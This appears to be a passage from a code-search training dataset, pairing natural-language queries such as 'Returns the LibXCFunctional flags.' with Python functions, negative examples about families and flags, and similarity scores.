print(PrettyFormatAny.form(l_obj, 'B2-05-A - Family'))\n self.assertEqual(l_obj.Name, TESTING_FAMILY_NAME_4)\n self.assertEqual(l_obj.Active, True)\n self.assertEqual(l_obj.Key, 4)\n self.assertEqual(l_obj.FamilyDevice_ModuleName, 'Hue_device')\n self.assertEqual(l_obj.FamilyPackageName, 'Modules.Families.Hue')\n self.assertEqual(l_obj.FamilyXml_ModuleName, 'Hue_xml')", "def get_family_id(self):\n return self._family_id", "def family_versions(self):\n return ['1.0']", "def test_family(self):\n\n for name in TEST_NAMES:\n self.colorspace.setFamily(name)\n self.assertEqual(name, self.colorspace.getFamily())", "def family(self) -> AddressFamily:\n return self.raw_socket.family", "def test_03_GetFamilyObj2(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_2\n l_obj = FamUtil._get_family_obj(self.m_pyhouse_obj, self.m_device_obj)\n # print(PrettyFormatAny.form(l_obj, 'B2-03-A - Family'))\n self.assertEqual(l_obj.Name, TESTING_FAMILY_NAME_2)\n self.assertEqual(l_obj.Active, True)\n self.assertEqual(l_obj.Key, 2)\n self.assertEqual(l_obj.FamilyDevice_ModuleName, 'UPB_device')\n self.assertEqual(l_obj.FamilyPackageName, 'Modules.Families.UPB')\n self.assertEqual(l_obj.FamilyXml_ModuleName, 'UPB_xml')", "def test_get_family_method(self):\n _el = MarkerId('test-name')\n self.assertEqual(_el.getFamilly(), 'test')", "def address_family(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"address_family\")", "def test_01_GetFamilyObj0(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_0\n l_obj = FamUtil._get_family_obj(self.m_pyhouse_obj, self.m_device_obj)\n # print(PrettyFormatAny.form(l_obj, 'B2-01-A - Family object'))\n self.assertEqual(l_obj.Name, TESTING_FAMILY_NAME_0)\n self.assertEqual(l_obj.Active, True)\n self.assertEqual(l_obj.Key, 0)\n self.assertEqual(l_obj.FamilyDevice_ModuleName, 'Null_device')\n self.assertEqual(l_obj.FamilyPackageName, 'Modules.Families.Null')\n self.assertEqual(l_obj.FamilyXml_ModuleName, 'Null_xml')", "def test_column_family_name_generation(self):\r\n class TestModel(Model):\r\n id = columns.UUID(primary_key=True, default=lambda:uuid4())\r\n text = columns.Text()\r\n\r\n assert TestModel.column_family_name(include_keyspace=False) == 'test_model'", "def get_stock(self):\n return 'geo-show-family'", "def AddressFamily(self) -> AddressFamily:", "def get_family_repr(self):\r\n return \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" % (self.trf_id,\r\n self.trf_period,\r\n self.trf_array_length,\r\n self.trf_array_gc,\r\n self.trf_pvar,\r\n self.trf_gi,\r\n self.trf_l_ind,\r\n self.trf_r_ind,\r\n self.trf_chr,\r\n self.trf_repbase,\r\n self.trf_superfamily,\r\n self.trf_family,\r\n self.trf_subfamily)", "def isFunctionalEntity(*args):\n return _libsbml.SBO_isFunctionalEntity(*args)", "def test_03_Family(self):\n l_xml = self.m_xml.light\n l_device = self.m_device_obj\n l_light = FamUtil.read_family_data(self.m_pyhouse_obj, l_device, l_xml)\n # print(PrettyFormatAny.form(l_light, 'C4-03-A - Light'))\n self.assertEqual(str(l_light.UPBAddress), TESTING_UPB_ADDRESS)", "def function(self):\n return self.devicefuncs[self._funcname]", "def FamilyCheck(legacy_flags, new_flags):\n\n global Asm\n\n family = dec.Asm.AVR_Family\n\n if family <= 4:\n # A legacy family name was used\n if family == 4:\n # XMega can do it all\n return True\n if family == 3 and (legacy_flags & 4):\n # Mega family allowed\n return True\n if family == 2 and (legacy_flags & 2):\n # AVR family allowed\n return True\n if family == 1 and (legacy_flags & 1):\n # Tiny family allowed\n return True\n # Instruction was is not a member of the selected family\n return False\n\n else:\n # A new family name was used\n if family == 5 and (new_flags & 1):\n # Member of reduced instructionset family\n return True\n if family == 6 and (new_flags & 2):\n # Member of minimal core instructionset family\n return True\n if family == 7 and (new_flags & 4):\n # Member of classic8k family\n return True\n if family == 8 and (new_flags & 8):\n # Member of classic128k family\n return True\n if family == 9 and (new_flags & 16):\n # Member of enhanced8k family\n return True\n if family == 10 and (new_flags & 32):\n # Member of enhanced128k family\n return True\n if family == 11 and (new_flags & 64):\n # Member of enhanced4M family\n return True\n # Instruction was is not a member of the selected family\n return False", "def get_scoped_to_feature() -> Iterable[Feature] | Feature | None:\n return Feature.METRICS", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def check_family(self):\n self._check_family()", "def validate_family(self, key, new_family): # pylint: disable=unused-argument\n\n if new_family not in ExclFamily.__members__.values():\n raise ValueError('Invalid family')\n\n if self.value:\n if new_family == ExclFamily.network:\n ip_network(self.value)\n if new_family == ExclFamily.regex:\n try:\n re.compile(self.value)\n except re.error:\n raise ValueError('Invalid regex')\n\n return new_family", "def fortran_function(self) -> str:\n return ''.join([i.fortran_function() for i in self.instances])", "def getSpeciesFeatureType(self):\n return _libsbml.SpeciesFeature_getSpeciesFeatureType(self)", "def family_id(self):\n\n return self._family_id", "def get_creature_family(self, region, namespace, id, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/creature-family/{0}', region, *[id], **filters)", "def address_family(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"address_family\")", "def get_fs_type(self):\n\t\treturn call_sdk_function('PrlFsInfo_GetFsType', self.handle)", "def get_family_hierarchy(self):\n # Implemented from template for\n # osid.resource.BinHierarchySession.get_bin_hierarchy\n if self._catalog_session is not None:\n return self._catalog_session.get_catalog_hierarchy()\n return self._hierarchy_session.get_hierarchy()", "def get_family_hierarchy(self):\n # Implemented from template for\n # osid.resource.BinHierarchySession.get_bin_hierarchy\n if self._catalog_session is not None:\n return self._catalog_session.get_catalog_hierarchy()\n return self._hierarchy_session.get_hierarchy()", "def getFunction(self) -> ghidra.program.model.listing.Function:\n ...", "def get_family(self, family_id):\n # Implemented from template for\n # osid.resource.BinLookupSession.get_bin\n if self._catalog_session is not None:\n return self._catalog_session.get_catalog(catalog_id=family_id)\n collection = JSONClientValidated('relationship',\n collection='Family',\n runtime=self._runtime)\n # Need to consider how to best deal with the \"phantom root\" catalog issue\n if family_id.get_identifier() == PHANTOM_ROOT_IDENTIFIER:\n return self._get_phantom_root_catalog(cat_class=objects.Family, cat_name='Family')\n try:\n result = collection.find_one({'_id': ObjectId(self._get_id(family_id, 'relationship').get_identifier())})\n except errors.NotFound:\n # Try creating an orchestrated Family. Let it raise errors.NotFound()\n result = self._create_orchestrated_cat(family_id, 'relationship', 'Family')\n\n return objects.Family(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)", "def fstype(self):\n return self._properties.get('fstype')", "def get_fluorescence(self):\n return self._lib.StGetFluorFlg()", "def list_flavors(cls):\n return cls.dbdriver.list_flavors()", "def address_family(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"address_family\")", "def getSpeciesFeatureType(self, *args):\n return _libsbml.MultiSpeciesType_getSpeciesFeatureType(self, *args)", "def use_federated_family_view(self):\n # Implemented from template for\n # osid.resource.ResourceLookupSession.use_federated_bin_view\n self._use_federated_catalog_view()", "def use_federated_family_view(self):\n # Implemented from template for\n # osid.resource.ResourceLookupSession.use_federated_bin_view\n self._use_federated_catalog_view()", "def test_04_GetDeviceName3(self):\n self.m_device_obj.Name = TESTING_FAMILY_NAME_3\n # print(PrettyFormatAny.form(self.m_device_obj, 'B1-04-A - Device'))\n l_name = family_utils._get_device_name(self.m_device_obj)\n # print(PrettyFormatAny.form(l_name, 'B1-04-B - Family'))\n self.assertEqual(l_name, TESTING_FAMILY_NAME_3)", "def _get_flint_func(cls, domain):\n if domain == ZZ:\n return flint.fmpz_mat\n elif domain == QQ:\n return flint.fmpq_mat\n else:\n raise NotImplementedError(\"Only ZZ and QQ are supported by DFM\")", "def supported_firmware_interfaces(self):\n return [fake.FakeFirmware] + super().supported_firmware_interfaces", "def getName(self):\n return _libsbml.SpeciesFeatureType_getName(self)", "def get_tested_func(self):\n t_ast = [x for x in self.AST.ext if type(x) is c_ast.FuncDef and x.decl.name == self.Fname]\n if len(t_ast) < 1:\n raise Exception(\"Func is not in ast\")\n else:\n return t_ast[0]", "def test_family_is_listed_in_gwf(self):\n url = 'http://fonts.googleapis.com/css?family=%s' % self.metadata['name'].replace(' ', '+')\n fp = requests.get(url)\n self.assertTrue(fp.status_code == 200, 'No family found in GWF in %s' % url)\n self.assertEqual(self.metadata.get('visibility'), 'External')", "def GetFlavor(params):\n flavors = {\n 'cygwin': 'win',\n 'win32': 'win',\n 'darwin': 'mac',\n }\n if 'flavor' in params:\n return params['flavor']\n if sys.platform in flavors:\n return flavors[sys.platform]\n if sys.platform.startswith('sunos'):\n return 'solaris'\n if sys.platform.startswith('freebsd'):\n return 'freebsd'\n if sys.platform.startswith('openbsd'):\n return 'openbsd'\n if sys.platform.startswith('netbsd'):\n return 'netbsd'\n if sys.platform.startswith('aix'):\n return 'aix'\n if sys.platform.startswith('zos'):\n return 'zos'\n if sys.platform.startswith('os390'):\n return 'zos'\n return 'linux'", "def test_02_GetDeviceName1(self):\n self.m_device_obj.Name = TESTING_FAMILY_NAME_1\n # print(PrettyFormatAny.form(self.m_device_obj, 'B1-02-A - Device'))\n l_name = family_utils._get_device_name(self.m_device_obj)\n # print(PrettyFormatAny.form(l_name, 'B1-02-B - Family'))\n self.assertEqual(l_name, TESTING_FAMILY_NAME_1)", "def get(self, *args):\n return _libsbml.ListOfSpeciesFeatureTypes_get(self, *args)", "def show_flavors():\n return get_flavors()", "def check_fam(x):\n func_arr = [is_triangle, is_square, is_penta, is_hexa, is_hepta, is_octa]\n for i in xrange(len(func_arr)):\n if func_arr[i](x):\n return i\n return None", "def getSpeciesFeature(self, *args):\n return _libsbml.MultiSpeciesPlugin_getSpeciesFeature(self, *args)", "def parse_os_family(os_key):\n\n if os_key in lookup_data.legacy_os_keys:\n os_key = lookup_data.legacy_os_keys[os_key]\n\n return lookup_data.os_keys.get(os_key, 'Unknown')", "def test_03_GetDeviceName2(self):\n self.m_device_obj.Name = TESTING_FAMILY_NAME_2\n # print(PrettyFormatAny.form(self.m_device_obj, 'B1-03-A - Device'))\n l_name = family_utils._get_device_name(self.m_device_obj)\n # print(PrettyFormatAny.form(l_name, 'B1-03-B - Family'))\n self.assertEqual(l_name, TESTING_FAMILY_NAME_2)", "def test_01_GetDeviceName0(self):\n self.m_device_obj.Name = TESTING_FAMILY_NAME_0\n # print(PrettyFormatAny.form(self.m_device_obj, 'B1-01-A - Device'))\n l_name = family_utils._get_device_name(self.m_device_obj)\n # print(PrettyFormatAny.form(l_name, 'B1-01-B - Family'))\n self.assertEqual(l_name, TESTING_FAMILY_NAME_0)", "def feature():\n pass", "def functional(self):\n return self.__functional", "def get(self, *args):\n return _libsbml.ListOfSpeciesFeatures_get(self, *args)", "def get_type(self):\n\t\treturn call_sdk_function('PrlFsInfo_GetType', self.handle)", "def column_family_name(cls, include_keyspace=True):\r\n cf_name = ''\r\n if cls.__table_name__:\r\n cf_name = cls.__table_name__.lower()\r\n else:\r\n # get polymorphic base table names if model is polymorphic\r\n if cls._is_polymorphic and not cls._is_polymorphic_base:\r\n return cls._polymorphic_base.column_family_name(include_keyspace=include_keyspace)\r\n\r\n camelcase = re.compile(r'([a-z])([A-Z])')\r\n ccase = lambda s: camelcase.sub(lambda v: '{}_{}'.format(v.group(1), v.group(2).lower()), s)\r\n\r\n cf_name += ccase(cls.__name__)\r\n #trim to less than 48 characters or cassandra will complain\r\n cf_name = cf_name[-48:]\r\n cf_name = cf_name.lower()\r\n cf_name = re.sub(r'^_+', '', cf_name)\r\n if not include_keyspace: return cf_name\r\n return '{}.{}'.format(cls._get_keyspace(), cf_name)", "def describe(self):\n\n ret = []\n ret.append(\"Functional ID: %s\" % self._number)\n ret.append(\"Functional Name: %s\" % self._xc_func_name)\n ret.append(\"Attributes:\")\n ret.append(\" Name: %s\" % self._name)\n ret.append(\" Kind: %d\" % self._kind)\n ret.append(\" Family: %d\" % self._family)\n ret.append(\"Citations:\")\n for x in self._refs:\n ret.append(\" \" + x)\n\n return \"\\n\".join(ret)", "def getQualitativeSpecies(self):\n return _libsbml.Input_getQualitativeSpecies(self)", "def test_get_family_method_without_dash(self):\n _el = MarkerId('testname')\n self.assertEqual(_el.getFamilly(), 'testname')", "def families(self):\n\n return [get_target_family_by_id(i) for i in self._family_ids]", "def _func(self):\n return self._get_flint_func(self.domain)", "def get_upgrade_flavour():\n if detect_sap_hana():\n return LEAPP_UPGRADE_FLAVOUR_SAP_HANA\n return LEAPP_UPGRADE_FLAVOUR_DEFAULT", "def get_upgrade_flavour():\n if detect_sap_hana():\n return LEAPP_UPGRADE_FLAVOUR_SAP_HANA\n return LEAPP_UPGRADE_FLAVOUR_DEFAULT", "def parse_browser_family(browser_key):\n return lookup_data.browser_keys.get(browser_key, 'Unknown')", "def get_type(self):\n return self.get_udev_property('ID_FS_TYPE')", "def flair_type(is_link: bool) -> str:\n return \"LINK_FLAIR\" if is_link else \"USER_FLAIR\"" ]
[ "0.6671878", "0.66315264", "0.6380709", "0.6380162", "0.62706983", "0.62706983", "0.62412816", "0.62412816", "0.62412816", "0.6231695", "0.6231695", "0.6231695", "0.6102895", "0.6017814", "0.5974126", "0.5966167", "0.58548194", "0.57114094", "0.5633405", "0.5601125", "0.5577917", "0.55569565", "0.552615", "0.54889655", "0.5476718", "0.5444216", "0.5440335", "0.54299563", "0.5403442", "0.5388547", "0.53666675", "0.53655916", "0.5317977", "0.5316432", "0.53106785", "0.52571374", "0.52181745", "0.5213806", "0.5204987", "0.5202174", "0.5189843", "0.51861906", "0.5166618", "0.5122363", "0.5094495", "0.5063327", "0.5058643", "0.5053712", "0.50488144", "0.50488144", "0.50488144", "0.5009678", "0.4985976", "0.49730277", "0.4961353", "0.49541324", "0.4951114", "0.4937758", "0.49241802", "0.4918371", "0.4918371", "0.4906773", "0.48974067", "0.4893709", "0.48673132", "0.48619926", "0.48595077", "0.4850317", "0.48333538", "0.48333538", "0.4825217", "0.4824032", "0.48201442", "0.47958606", "0.47821662", "0.4771752", "0.4768188", "0.47656652", "0.4762086", "0.47416645", "0.47297978", "0.47277784", "0.4722869", "0.47166753", "0.4712041", "0.47090793", "0.4701759", "0.47013775", "0.47011295", "0.46971858", "0.46916208", "0.46905586", "0.46879914", "0.46846652", "0.4677427", "0.46712923", "0.46712923", "0.46661612", "0.46638718", "0.46624297" ]
0.68424135
0
Returns the LibXCFunctional flags.
def get_flags(self): return self._flags
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def feature_flags(self):\r\n return self.env_tokens.get('FEATURES', dict())", "def get_flags(cls):\n return cls.get_short_flag(), cls.get_flag()", "def get_flags(self):\n return self.short_flag, self.long_flag", "def get_system_flags(self):\n\t\treturn call_sdk_function('PrlVmCfg_GetSystemFlags', self.handle)", "def flags(self) -> Optional[int]:\n return self.get(\"/Ff\")", "def list_flags(self):\n return self._defs.items()", "def flags(self):\n return self._flags", "def flags(self):\n return c.Flags(self)", "def get_feature_flags(self, account, signing_account=None):\n account = Account(account, hive_instance=self.hive)\n feature_flags = self._conveyor_method(account, signing_account,\n \"conveyor.get_feature_flags\",\n [account['name']])\n if \"result\" in feature_flags:\n return feature_flags[\"result\"]\n else:\n return feature_flags", "def supported_features(self):\n return SUPPORT_FLAGS", "def supported_features(self):\n return SUPPORT_FLAGS", "def supported_features(self):\n return SUPPORT_FLAGS", "def supported_features(self):\n return SUPPORT_FLAGS", "def supported_features(self):\n return self._support_flags", "def supported_features(self):\n return self._support_flags", "def supported_features(self):\n return self._support_flags", "def supported_features(self):\n return self._support_flags", "def flags(self,index):\n return self._flags", "def flags(self):\n return list(self._flags_generator())", "def _flags(self):\n done, data = self._request('GE')\n if done:\n flags = int(data[1], 16)\n else:\n raise EvseError\n return {\n 'service_level': (flags & 0x0001) + 1,\n 'diode_check': not flags & 0x0002,\n 'vent_required': not flags & 0x0004,\n 'ground_check': not flags & 0x0008,\n 'stuck_relay_check': not flags & 0x0010,\n 'auto_service_level': not flags & 0x0020,\n 'auto_start': not flags & 0x0040,\n 'serial_debug': not not flags & 0x0080,\n 'lcd_type': 'monochrome' if flags & 0x0100 else 'rgb',\n 'gfi_self_test': not flags & 0x0200\n }", "def flags(self):\n if self._flags is None:\n raise ValueError('Flags are not available since dataset '\n 'was opened with metadata only')\n return self._flags", "def flags(self):\n flags = self.Flags\n return [x for x in self.FLAGS_VALUES if flags & x]", "def flags(self):\n return self.__flag_set", "def get_flags(self):\n\n if self.raw.flags not in [0, 1, 2, 3]:\n raise ValueError(\"Invalid raw flags: {}\".format(self.raw.flags))\n\n flags = set()\n\n if (self.raw.flags & 0b010) > 0:\n flags.add(\"DF\")\n\n if (self.raw.flags & 0b001) > 0:\n flags.add(\"MF\")\n\n return frozenset(flags)", "def flags(self):\n return self.ast_node.flags", "def _get_fortran_flags(\n target,\n fc,\n fflags,\n debug,\n double=False,\n sharedobject=False,\n osname=None,\n verbose=False,\n):\n flags = []\n\n # define fortran flags\n if fc is not None:\n # remove .exe extension of necessary\n fc = _get_base_app_name(fc)\n\n # remove target .exe extension, if necessary\n target = _get_base_app_name(target)\n\n # get lower case OS string\n if osname is None:\n osname = _get_osname()\n\n # get - or / to prepend for compiler switches\n prepend = _get_prepend(fc, osname)\n\n # generate standard fortran flags\n if fc == \"gfortran\":\n if sharedobject:\n if osname != \"win32\":\n flags.append(\"fPIC\")\n else:\n if osname == \"win32\":\n flags.append(\"static\")\n if \"fPIC\" in flags:\n flags.remove(\"fPIC\")\n flags.append(\"fbacktrace\")\n if debug:\n flags += [\"g\", \"fcheck=all\", \"fbounds-check\", \"Wall\"]\n if _check_gnu_switch_available(\"-ffpe-trap\", verbose=verbose):\n flags.append(\"ffpe-trap=overflow,zero,invalid,denormal\")\n else:\n if _check_gnu_switch_available(\"-ffpe-summary\"):\n flags.append(\"ffpe-summary=overflow\")\n if _check_gnu_switch_available(\"-ffpe-trap\"):\n flags.append(\"ffpe-trap=overflow,zero,invalid\")\n if double:\n flags += [\"fdefault-real-8\", \"fdefault-double-8\"]\n # define the OS macro for gfortran\n os_macro = _get_os_macro(osname)\n if os_macro is not None:\n flags.append(os_macro)\n elif fc in [\"ifort\", \"mpiifort\"]:\n if osname == \"win32\":\n flags += [\"heap-arrays:0\", \"fpe:0\", \"traceback\", \"nologo\"]\n if debug:\n flags += [\"debug:full\", \"Zi\"]\n if double:\n flags += [\"real-size:64\", \"double-size:64\"]\n else:\n if sharedobject:\n flags.append(\"fPIC\")\n else:\n if \"fPIC\" in flags:\n flags.remove(\"fPIC\")\n if debug:\n flags += [\"g\"]\n flags += [\"no-heap-arrays\", \"fpe0\", \"traceback\"]\n if double:\n flags += [\"r8\", \"autodouble\"]\n\n # process passed fortran flags - check for flags with a space between\n # the flag and a setting\n for idx, flag in enumerate(fflags[1:]):\n if flag[0] not in (\"/\", \"-\"):\n fflags[idx] += \" {}\".format(flag)\n fflags[idx + 1] = \"\"\n\n # Add passed fortran flags - assume that flags have - or / as the\n # first character. fortran flags starting with O are excluded\n for flag in fflags:\n if len(flag) < 1:\n continue\n if flag[1] != \"O\":\n if flag[1:] not in flags:\n flags.append(flag[1:])\n\n # add target specific fortran switches\n tlist = _set_fflags(target, fc=fc, argv=False, osname=osname)\n if tlist is not None:\n for flag in tlist:\n if flag[1] != \"O\":\n if flag[1:] not in flags:\n flags.append(flag[1:])\n\n # add prepend to compiler flags\n for idx, flag in enumerate(flags):\n flags[idx] = prepend + flag\n\n return flags", "def format_flags(self):\n flags = []\n if self.is_unique:\n flags.append('Unique')\n if self.is_weak:\n flags.append('Weak')\n if self.is_ctor:\n flags.append('Constructor')\n if self.is_warning:\n flags.append('Warning')\n if self.is_ref:\n flags.append('Indirect reference')\n if self.is_reloc:\n flags.append('Reloc function')\n if self.is_debug:\n flags.append('Debug')\n if self.is_dynamic:\n flags.append('Dynamic')\n if self.is_func:\n flags.append('Function')\n if self.is_file:\n flags.append('File')\n if self.is_object:\n flags.append('Object')\n return flags", "def flags(self):\r\n return flags.FaqFlags(self)", "def hive_flags(self):\n return self.unpack_dword(0x8)", "def flags(self) -> list[\"ProjectCommandFlag\"]:\n _args: list[Arg] = []\n _ctx = self._select(\"flags\", _args)\n _ctx = ProjectCommandFlag(_ctx)._select_multiple(\n _description=\"description\",\n _name=\"name\",\n )\n return _ctx.execute_sync(list[ProjectCommandFlag])", "def flags(self):\n data = struct.pack('=I', self.FileFlags & self.FileFlagsMask)\n addr_space = addrspace.BufferAddressSpace(self.obj_vm.get_config(), 0, data)\n bitmap = {'Debug': 0,\n 'Prerelease': 1,\n 'Patched': 2,\n 'Private Build': 3,\n 'Info Inferred': 4,\n 'Special Build' : 5,\n }\n return obj.Object('Flags', offset = 0, vm = addr_space, bitmap = bitmap)", "def test_get_all_flags(self):\n include_prefixes = ['-I']\n db = CppProperties(include_prefixes)\n\n expected = [\n Flag('-I', path.normpath('/folder/include/path')),\n Flag('-I', path.normpath('/another/file/path')),\n ]\n\n scope = SearchScope(from_folder=_get_test_folder('simple'))\n self.assertEqual(expected, db.get_flags(search_scope=scope))", "def test_flags(self):\n d = self._examineOrSelect()\n self._response(\n b'* FLAGS (\\\\Answered \\\\Flagged \\\\Deleted \\\\Seen \\\\Draft)')\n self.assertEqual(\n self.successResultOf(d), {\n 'READ-WRITE': False,\n 'FLAGS': ('\\\\Answered', '\\\\Flagged', '\\\\Deleted', '\\\\Seen',\n '\\\\Draft')})", "def flags(self) -> UserFlag:", "def flags(self) -> undefined.UndefinedOr[UserFlag]:", "def hive_flags(self):\n return self.unpack_dword(0x90)", "def features(self) -> Optional[pulumi.Input['DevToolPortalFeatureSettingsArgs']]:\n return pulumi.get(self, \"features\")", "def get_all_flags(options):\n flags = []\n if options.inputFlag:\n flags.append(try_to_int(options.inputFlag))\n if options.outputFlags:\n for flag in options.outputFlags:\n flags.append(try_to_int(flag))\n return flags", "def use_flags(*funcs):\n\n global GLOBAL_STATUS\n if funcs:\n GLOBAL_STATUS.discard('ERRORS')\n GLOBAL_STATUS.add('FLAGS')\n else:\n GLOBAL_STATUS.discard('ERRORS')\n GLOBAL_STATUS.discard('FLAGS')\n\n for name in _get_func_names(funcs):\n if 'error' not in name and 'flag' not in name:\n globals()[name] = globals()[name].flag", "def supported_features(self) -> int:\n return self._support_flags", "def get_current_cpu_flags() -> Set[str]:\n\n cpuinfo = get_cpuinfo()\n flags = extract_cpu_flags(cpuinfo)\n return flags", "def read_flags():\n return flag_args", "def get_flags():\n flags.DEFINE_string(\n 'model_name',\n help='MobileNet version name: mobilenet_v1, mobilenet_v2, '\n 'mobilenet_v3_small and mobilenet_v3_large',\n default='mobilenet_v1'\n )\n flags.DEFINE_string(\n 'dataset_name',\n help='Dataset name from TDFS to train on: imagenette, imagenet2012',\n default='imagenette'\n )\n flags.DEFINE_string(\n 'model_dir',\n help='Working directory.',\n default='./tmp'\n )\n flags.DEFINE_string(\n 'data_dir',\n help='Directory for training data.',\n default=None\n )\n flags.DEFINE_bool(\n 'resume_checkpoint',\n help='Whether resume training from previous checkpoint.',\n default=False\n )\n flags.DEFINE_string(\n 'optimizer_name',\n help='Name of optimizer.',\n default='rmsprop'\n )\n flags.DEFINE_string(\n 'learning_scheduler_name',\n help='Name of learning rate scheduler.',\n default='exponential'\n )\n # for hyperparameter tuning\n flags.DEFINE_float(\n 'op_momentum',\n help='Optimizer momentum.',\n default=0.9\n )\n flags.DEFINE_float(\n 'op_decay_rate',\n help='Optimizer discounting factor for gradient.',\n default=0.9\n )\n flags.DEFINE_float(\n 'lr',\n help='Base learning rate.',\n default=0.008\n )\n flags.DEFINE_float(\n 'lr_decay_rate',\n help='Magnitude of learning rate decay.',\n default=0.97\n )\n flags.DEFINE_float(\n 'lr_decay_epochs',\n help='Frequency of learning rate decay.',\n default=2.4\n )\n flags.DEFINE_float(\n 'label_smoothing',\n help='The amount of label smoothing.',\n default=0.0,\n )\n flags.DEFINE_float(\n 'ma_decay_rate',\n help='Exponential moving average decay rate.',\n default=None\n )\n flags.DEFINE_float(\n 'dropout_rate',\n help='Dropout rate.',\n default=0.2\n )\n flags.DEFINE_float(\n 'std_weight_decay',\n help='Standard weight decay.',\n default=0.00004\n )\n flags.DEFINE_float(\n 'truncated_normal_stddev',\n help='The standard deviation of the truncated normal weight initializer.',\n default=0.09\n )\n flags.DEFINE_float(\n 'batch_norm_decay',\n help='Batch norm decay.',\n default=0.9997\n )\n flags.DEFINE_integer(\n 'batch_size',\n help='Training batch size.',\n default=4 # for testing purpose\n )\n flags.DEFINE_integer(\n 'epochs',\n help='Number of epochs.',\n default=5\n )", "def GetAGWFlags(self):\r\n \r\n return self._agwFlags", "def process_flags(self):\n\t\tsflags = []\n\t\tfor attr in dir(self):\n\t\t\tif attr[:3] != \"PF_\":\n\t\t\t\tcontinue\n\t\t\tvalue = getattr(self, attr)\n\t\t\tif value & self.fields[\"flags\"]:\n\t\t\t\tsflags.append(attr)\n\n\t\treturn sflags", "def fan_modes(self) -> list[str] | None:\n return FAN_OPERATION_LIST", "def database_flags(self) -> Sequence['outputs.DatabaseFlagsResponse']:\n return pulumi.get(self, \"database_flags\")", "def supported_features(self):\n return GH_SUPPORT_FLAGS", "def GetAGWFlags(self):\r\n\r\n return self._agwFlags", "def GetAGWFlags(self):\r\n\r\n return self._agwFlags", "def GetAGWFlags(self):\r\n\r\n return self._agwFlags", "def GetAGWFlags(self):\r\n\r\n return self._agwFlags", "def flags(self):\n\n return FlagSetAttr(self)", "def test_getlist(self):\n flags = flag_lists(appversions={\"code\": \"fx1.0\"})\n eq_(flags, {(\"fx\", \"pl\"): [0],\n (\"fx\", \"de\"): [1],\n (\"fx\", \"fr\"): [2],\n (\"fx\", \"da\"): [1, 0]})", "def SrlbFlags(self):\r\n\t\treturn self._get_attribute('srlbFlags')", "def or_cpp_flags(self, flags):\n flags_dict = {\"deprecated\": \"vtable::common_::deprecated\",\n \"hidden\": \"vtable::common_::hidden\",\n \"unprivileged\": \"vtable::common_::unprivileged\",\n \"no_reply\": \"vtable::method_::no_reply\"}\n\n cpp_flags = []\n for flag in flags:\n try:\n cpp_flags.append(flags_dict[flag])\n except KeyError:\n raise ValueError(\"Invalid flag \\\"{}\\\"\".format(flag))\n\n return \" | \".join(cpp_flags)", "def getdefflags(config_nm):\n if config_nm is 'train':\n user_params = user_params_train\n elif config_nm is 'eval':\n user_params = user_params_eval\n elif config_nm is 'tfrecorder':\n user_params = user_params_recorder\n else:\n print('Unrecognized configuration name : %s, exiting ....' % config_nm)\n exit(-1)\n\n\n return mandatory_params+user_params", "def _build_flags(deploy):\n\n flags = ['R' if deploy['running'] else 'S',\n 'E' if deploy['enabled'] else 'D']\n\n if 'running' in deploy['container_status']:\n flags.append('r' if deploy['container_status']['running'] else 's')\n else:\n flags.append('-')\n\n flags.append('C' if 'callback_uri' in deploy else '-')\n\n return \"\".join(flags)", "def getFeatures(self, state, action):\n util.raiseNotDefined()", "def parseFlags(self):\n # Blank return value.\n retVal = \"\"\n \n try:\n # Store flags as we parse them.\n allFlags = []\n \n # Get the accumulator flag.\n accFlag = self.__flags & self.f_accum\n trendFlag = self.__flags & self.f_trend\n modeFlag = self.__flags & self.f_mode\n \n # Complete set of readings?\n if accFlag == self.f_accum_complete:\n # Completed loading values into the accumulator.\n allFlags.append('C')\n elif accFlag == self.f_accum_accum:\n # Still accumulating.\n allFlags.append('A')\n elif accFlag == self.f_accum_unk:\n # Unknown.\n allFlags.append('?')\n else:\n # Bad value.\n allFlags.append('!')\n \n # Trend?\n if (trendFlag) == self.f_trend_stable:\n # Readings stable.\n allFlags.append('S')\n elif (trendFlag) == self.f_trend_up:\n # Still accumulating.\n allFlags.append('U')\n elif (trendFlag) == self.f_trend_dn:\n # Still accumulating.\n allFlags.append('D')\n elif (trendFlag) == self.f_trend_unk:\n # Still accumulating.\n allFlags.append('?')\n else:\n # Bad value.\n allFlags.append('!')\n \n # Mode?\n if modeFlag == self.f_mode_fast:\n # Fast\n allFlags.append('F')\n elif modeFlag == self.f_mode_slow:\n # Slow\n allFlags.append('S')\n elif modeFlag == self.f_mode_counter:\n # Stream\n allFlags.append('C')\n elif modeFlag == self.f_mode_scaler:\n # Roll\n allFlags.append('L')\n else:\n # Bad value.\n allFlags.append('!')\n \n # Build a nice string.\n retVal = ''.join(allFlags)\n \n \n except:\n raise\n \n # Return value.\n return retVal", "def getFlags(self, label):\n\n flags = self._getFlags(label)\n if flags is not None:\n return flags.copy()", "def flags(self):\n from mkidpipeline.pipeline import PIPELINE_FLAGS # This must be here to prevent a circular import!\n\n names = self.query_header('flags')\n if not names:\n getLogger(__name__).warning('Flag names were not attached at time of H5 creation. '\n 'If beammap flags have changed since then things WILL break. '\n 'You must recreate the H5 file.')\n names = PIPELINE_FLAGS.names\n self.enablewrite()\n self.update_header('flags', names)\n self.disablewrite()\n\n f = FlagSet.define(*[(n, i, PIPELINE_FLAGS.flags[n].description if n in PIPELINE_FLAGS.flags else '')\n for i, n in enumerate(names)])\n return f", "def get_status():\n return ('off', 'off')", "def __int__(self):\n\n return self.bitflags", "def supported_features(self):\n return self._supported_features", "def source_flags(self):\n return self.ast_node.source_flags", "def wake_flags(self):\n\n res = self.read_block(REG_WAKE_FLAGS, 1)\n\n ret = {k: bool(res[0] & v) for k, v in 